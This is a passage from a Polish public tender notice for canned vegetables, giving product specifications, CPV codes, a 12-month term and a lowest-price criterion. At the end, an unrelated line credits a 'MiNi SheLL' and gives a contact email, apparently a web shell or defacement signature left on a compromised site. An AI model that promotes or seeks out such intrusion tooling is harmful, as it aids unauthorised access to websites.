fasola czerwona &ndash; ziarno, woda, s&oacute;l, op. jedn. 400-500g. Po odcieku nie mniej niż 200g. Typu &bdquo;Kwidzyn&rdquo; PN-A-77802 kg 60 18. Minikolby kukurydzy 15331500-2 Op. jedn. 300-400g, po odcieku nie mniej niż 200g. kg 20 19. Pieczarki krojone 15331135-2 Pieczarki krojone w zalewie słonej. Skład: pieczarki krojone, woda, s&oacute;l, kwasek cytrynowy. Produkt pasteryzowany. Masa netto 800g. Masa po odcieku nie mniej niż 550g. PN-92/A-78503 kg 100 20. Przecier og&oacute;rkowy 15331000-7 Skład: og&oacute;rki kwaszone przetarte, przyprawy. Produkt pasteryzowany. Op. jedn. 320-350ml, Masa netto nie mniej niż 280g. kg 30 21. Szczaw konserwowy 15331400-1 Szczaw konserwowy pasteryzowany. Skład: liść szczawiu, przyprawy smakowe. Op. jedn. 320ml. Masa netto nie mniej niż 280g. kg 50 22. Pomidory krojone Pomidory krojone. Skład: pomidory nie mniej niż 60%, sok pomidorowy nie mniej niż 39 %. Op. jedn. Puszka 2,5-3 kg Typu &bdquo; Pudliszki&rdquo; lub r&oacute;wnoważne. kg 30</p>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.21.00-5, 15.33.14.62-3, 15.33.11.10-1, 15.33.14.27-6, 15.33.14.70-2, 15.33.31.10-1, 15.33.15.00-2, 15.33.11.36-9, 15.33.22.90-3, 15.30.00.00-1, 15.33.14.61-6, 15.33.11.10-1, 15.33.14.64-7, 15.33.11.35-2, 15.33.10.00-7, 15.33.14.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com